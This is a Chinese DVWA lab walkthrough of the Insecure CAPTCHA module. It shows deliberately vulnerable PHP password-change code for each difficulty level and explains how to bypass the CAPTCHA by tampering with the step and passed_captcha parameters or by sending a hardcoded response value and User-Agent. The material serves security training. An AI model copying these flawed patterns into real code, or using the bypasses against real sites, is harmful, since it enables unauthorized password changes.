Insecure CAPTCHA(不安全的验证码)
Insecure CAPTCHA
Insecure CAPTCHA,意思是不安全的验证码,CAPTCHA是Completely Automated Public Turing Test to Tell Computers and Humans Apart (全自动区分计算机和人类的图灵测试)的简称。验证码是没有问题的,关键是代码写的有问题,可以绕过。
环境需要把config.inc.php中的recaptcha_public_key \recaptcha_private_key补充。
reCAPTCHA验证流程
LOW
代码情况
Unknown Vulnerability Source
vulnerabilities/captcha/source/low.php
<?phpif( isset( $_POST[ 'Change' ] ) && ( $_POST[ 'step' ] == '1' ) ) {// Hide the CAPTCHA form$hide_form = true;// Get input$pass_new = $_POST[ 'password_new' ];$pass_conf = $_POST[ 'password_conf' ];// Check CAPTCHA from 3rd party$resp = recaptcha_check_answer($_DVWA[ 'recaptcha_private_key'],$_POST['g-recaptcha-response']);// Did the CAPTCHA fail?if( !$resp ) {// What happens when the CAPTCHA was entered incorrectly$html .= "<pre><br />The CAPTCHA was incorrect. Please try again.</pre>";$hide_form = false;return;}else {// CAPTCHA was correct. Do both new passwords match?if( $pass_new == $pass_conf ) {// Show next stage for the userecho "<pre><br />You passed the CAPTCHA! Click the button to confirm your changes.<br /></pre><form action=\"#\" method=\"POST\"><input type=\"hidden\" name=\"step\" value=\"2\" /><input type=\"hidden\" name=\"password_new\" value=\"{$pass_new}\" /><input type=\"hidden\" name=\"password_conf\" value=\"{$pass_conf}\" /><input type=\"submit\" name=\"Change\" value=\"Change\" /></form>";}else {// Both new passwords do not match.$html .= "<pre>Both passwords must match.</pre>";$hide_form = false;}}
}if( isset( $_POST[ 'Change' ] ) && ( $_POST[ 'step' ] == '2' ) ) {// Hide the CAPTCHA form$hide_form = true;// Get input$pass_new = $_POST[ 'password_new' ];$pass_conf = $_POST[ 'password_conf' ];// Check to see if both password matchif( $pass_new == $pass_conf ) {// They do!$pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));$pass_new = md5( $pass_new );// Update database$insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";$result = mysqli_query($GLOBALS["___mysqli_ston"], $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );// Feedback for the end userecho "<pre>Password Changed.</pre>";}else {// Issue with the passwords matchingecho "<pre>Passwords did not match.</pre>";$hide_form = false;}((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}?>
recaptcha_check_answer(privkey,privkey,privkey,remoteip, challenge,challenge,challenge,response)参数privkey是服务器申请的privatekey,privkey是服务器申请的private key ,privkey是服务器申请的privatekey,remoteip是用户的ip,challenge是recaptchachallengefield字段的值,来自前端页面,challenge 是recaptcha_challenge_field 字段的值,来自前端页面 ,challenge是recaptchachallengefield字段的值,来自前端页面,response是 recaptcha_response_field 字段的值。
通过代码,发现step=2,和2个密码相同就可以直接写入数据库更新。不需要验证码正确。
step=1时需要匹配验证码,所以验证失败,无法修改密码。
step=2时,无需通过谷歌验证码验证。2个密码一样即可通过验证,修改密码。
验证漏洞时,需要开个梯子。
Medium
Unknown Vulnerability Source
vulnerabilities/captcha/source/medium.php
<?phpif( isset( $_POST[ 'Change' ] ) && ( $_POST[ 'step' ] == '1' ) ) {// Hide the CAPTCHA form$hide_form = true;// Get input$pass_new = $_POST[ 'password_new' ];$pass_conf = $_POST[ 'password_conf' ];// Check CAPTCHA from 3rd party$resp = recaptcha_check_answer($_DVWA[ 'recaptcha_private_key' ],$_POST['g-recaptcha-response']);// Did the CAPTCHA fail?if( !$resp ) {// What happens when the CAPTCHA was entered incorrectly$html .= "<pre><br />The CAPTCHA was incorrect. Please try again.</pre>";$hide_form = false;return;}else {// CAPTCHA was correct. Do both new passwords match?if( $pass_new == $pass_conf ) {// Show next stage for the userecho "<pre><br />You passed the CAPTCHA! Click the button to confirm your changes.<br /></pre><form action=\"#\" method=\"POST\"><input type=\"hidden\" name=\"step\" value=\"2\" /><input type=\"hidden\" name=\"password_new\" value=\"{$pass_new}\" /><input type=\"hidden\" name=\"password_conf\" value=\"{$pass_conf}\" /><input type=\"hidden\" name=\"passed_captcha\" value=\"true\" /><input type=\"submit\" name=\"Change\" value=\"Change\" /></form>";}else {// Both new passwords do not match.$html .= "<pre>Both passwords must match.</pre>";$hide_form = false;}}
}if( isset( $_POST[ 'Change' ] ) && ( $_POST[ 'step' ] == '2' ) ) {// Hide the CAPTCHA form$hide_form = true;// Get input$pass_new = $_POST[ 'password_new' ];$pass_conf = $_POST[ 'password_conf' ];// Check to see if they did stage 1if( !$_POST[ 'passed_captcha' ] ) {$html .= "<pre><br />You have not passed the CAPTCHA.</pre>";$hide_form = false;return;}// Check to see if both password matchif( $pass_new == $pass_conf ) {// They do!$pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));$pass_new = md5( $pass_new );// Update database$insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";$result = mysqli_query($GLOBALS["___mysqli_ston"], $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );// Feedback for the end userecho "<pre>Password Changed.</pre>";}else {// Issue with the passwords matchingecho "<pre>Passwords did not match.</pre>";$hide_form = false;}((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}?>
Medium级别的代码增加了passed_captcha=ture的验证,本质上没有区别。依旧可以通过参数step、passed_captcha进行绕过。
step=2成功绕过passed_captcha=ture
High
Unknown Vulnerability Source
vulnerabilities/captcha/source/high.php
<?phpif( isset( $_POST[ 'Change' ] ) ) {// Hide the CAPTCHA form$hide_form = true;// Get input$pass_new = $_POST[ 'password_new' ];$pass_conf = $_POST[ 'password_conf' ];// Check CAPTCHA from 3rd party$resp = recaptcha_check_answer($_DVWA[ 'recaptcha_private_key' ],$_POST['g-recaptcha-response']);if ($resp || ($_POST[ 'g-recaptcha-response' ] == 'hidd3n_valu3'&& $_SERVER[ 'HTTP_USER_AGENT' ] == 'reCAPTCHA')){// CAPTCHA was correct. Do both new passwords match?if ($pass_new == $pass_conf) {$pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));$pass_new = md5( $pass_new );// Update database$insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "' LIMIT 1;";$result = mysqli_query($GLOBALS["___mysqli_ston"], $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );// Feedback for userecho "<pre>Password Changed.</pre>";} else {// Ops. Password mismatch$html .= "<pre>Both passwords must match.</pre>";$hide_form = false;}} else {// What happens when the CAPTCHA was entered incorrectly$html .= "<pre><br />The CAPTCHA was incorrect. Please try again.</pre>";$hide_form = false;return;}((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}// Generate Anti-CSRF token
generateSessionToken();?>
可以看到,服务器的验证逻辑是当$resp(这里是指谷歌返回的验证结果)是false,并且参数g-recaptcha_response_field不等于hidd3n_valu3(或者http包头的User-Agent参数不等于reCAPTCHA)时,就认为验证码输入错误,反之则认为已经通过了验证码的检查。
$resp不可控,修改UA头和g-recaptcha-response绕过
Impossible
Unknown Vulnerability Source
vulnerabilities/captcha/source/impossible.php
<?phpif( isset( $_POST[ 'Change' ] ) ) {// Check Anti-CSRF tokencheckToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );// Hide the CAPTCHA form$hide_form = true;// Get input$pass_new = $_POST[ 'password_new' ];$pass_new = stripslashes( $pass_new );$pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));$pass_new = md5( $pass_new );$pass_conf = $_POST[ 'password_conf' ];$pass_conf = stripslashes( $pass_conf );$pass_conf = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass_conf ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));$pass_conf = md5( $pass_conf );$pass_curr = $_POST[ 'password_current' ];$pass_curr = stripslashes( $pass_curr );$pass_curr = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass_curr ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));$pass_curr = md5( $pass_curr );// Check CAPTCHA from 3rd party$resp = recaptcha_check_answer($_DVWA[ 'recaptcha_private_key' ],$_POST['g-recaptcha-response']);// Did the CAPTCHA fail?if( !$resp ) {// What happens when the CAPTCHA was entered incorrectlyecho "<pre><br />The CAPTCHA was incorrect. Please try again.</pre>";$hide_form = false;}else {// Check that the current password is correct$data = $db->prepare( 'SELECT password FROM users WHERE user = (:user) AND password = (:password) LIMIT 1;' );$data->bindParam( ':user', dvwaCurrentUser(), PDO::PARAM_STR );$data->bindParam( ':password', $pass_curr, PDO::PARAM_STR );$data->execute();// Do both new password match and was the current password correct?if( ( $pass_new == $pass_conf) && ( $data->rowCount() == 1 ) ) {// Update the database$data = $db->prepare( 'UPDATE users SET password = (:password) WHERE user = (:user);' );$data->bindParam( ':password', $pass_new, PDO::PARAM_STR );$data->bindParam( ':user', dvwaCurrentUser(), PDO::PARAM_STR );$data->execute();// Feedback for the end user - success!echo "<pre>Password Changed.</pre>";}else {// Feedback for the end user - failed!echo "<pre>Either your current password is incorrect or the new passwords did not match.<br />Please try again.</pre>";$hide_form = false;}}
}// Generate Anti-CSRF token
generateSessionToken();?>
Impossible级别的代码增加了Anti-CSRF token 机制防御CSRF攻击,利用PDO技术防护sql注入,验证码无法绕过,同时要求用户输入旧密码,hacker不知道旧密码的情况下无法通过认证。
Insecure CAPTCHA(不安全的验证码)相关推荐
- DVWA--Insecure CAPTCHA(不安全的验证码)(全难度)
DVWA–Insecure CAPTCHA(不安全的验证码) Insecure CAPTCHA,意思是不安全的验证码,CAPTCHA是Completely Automated Public Turin ...
- DVWA之Insecure Captcha
Insecure CAPTCHA Insecure CAPTCHA,意思是不安全的验证码,CAPTCHA是Completely Automated Public Turing Test to Tell ...
- captcha.js一个生成验证码的插件,使用js和canvas生成
一.captcha`captcha.js`是一个生成验证码的插件,使用js和canvas生成的,确保后端服务被暴力攻击,简单判断人机以及系统的安全性,体积小,功能多,支持配置. 验证码插件内容,包含1 ...
- DVWA 之 Insecure CAPTCHA(不安全的验证码)
目录 1.级别:Low 2.级别:Medium 3.级别:High 刚进入DVWA看见报错,意思是验证码的密钥找不到了 需要在..\..\..\DVWA-master\config\config.in ...
- php ci captcha使用,CodeIgniter框架验证码类库文件与用法示例
本文实例讲述了CodeIgniter框架验证码类库文件与用法.分享给大家供大家参考,具体如下: 折腾了我四五个小时,终于,ci的验证码类库成功的整出来了. 下面请看源码: 在application/l ...
- 用PyTorch训练模型识别captcha库生成的验证码
目录 制作训练数据集 用Dataloader加载自定义的Dataset 训练模型 识别验证码 总结与提高 源码下载 在本节,我们将使用深度学习框架PyTorch来训练模型去识别一种难度稍大一点的数字+ ...
- DVWA通关教程(中)
不安全的验证码(Insecure CAPTCHA) Insecure CAPTCHA(不安全的验证码)主要是绕过验证码的安全验证,一般都有逻辑漏洞. 难度(low) 审计代码 <?phpif( ...
- 【工具-DVWA】DVWA的安装和使用
1 Wamp安装 Wamp:Apache+Mysql/MariaDB+Perl/PHP/Python 下载地址:http://www.wampserver.com/en/#download-wrapp ...
- 跨站脚本(XSS)攻击
什么是XSS 全称:Cross Site Script(跨站脚本) 为了与层叠样式表css区分,将跨站脚本简写为XSS 危害:盗取用户信息.钓鱼.制造蠕虫等. 概念 概念:黑客通过"HTML ...
- DVWA靶场通关笔记
文章目录 Brute Force 暴力破解 Low Medium High Impossible 防护总结: Command Injection 命令注入 危害: Low Medium High Im ...
最新文章
- 高级转录组分析和R语言数据可视化第12期 (线上线下同时开课)
- dirname(__FILE__) 的使用总结
- Java中Comparable与Comparator的区别
- 分库与分表设计-垂直切分
- springboot访问jsp页面变成直接下载?
- 团队作业2 需求分析与原型设计
- (HDFS)搭建eclipse搭建hadoop开发平台以及hdfs api调用——大数据分析及其可视化4
- php w3cschool 手册,w3cschool菜鸟教程离线版chm手册正式发布
- C语言题目:输出三角形面积和周长 (15 分)
- mac支持fat32格式吗 mac支持什么格式的移动硬盘
- 小程序:解析h5标签
- python3使用蓝本Blueprint
- WP模板兔模板V4.3 去除授权+多功能插件
- MATLAB颜色图中,小于某个值的所有点设为白色
- 计算机实际上是如何工作的
- 任正非十大经典比喻:善形象阐释管理理念
- 这5大研究热点可能会改变个性化推荐系统的未来2018
- 树莓派 3的新手指南
- Android:使用MuPdf开源库阅读PDF文件
- 网易极客战记-KITHGARD地牢--Kithgrad地牢
热门文章
- 读研整活笔记1:调研编译器solang
- 自己写了个cgi-bin,报错!
- STM32固件库点灯
- 怎么批量查询银行卡号是哪个银行
- ubuntu流量监控_ubuntu 流量监控
- 近期看到的很有意思的文章
- crt图形显示装置_CRT消防控制室图形显示装置图形显示装置_使用说明书_V1.0.doc...
- 计算机常用的IP地址三类,常用的三类IP地址
- 51单片机最小系统的c语言,89c51单片机最小系统,89c51最小系统原理图的功能详解...
- Oracle学习——第五讲(约束)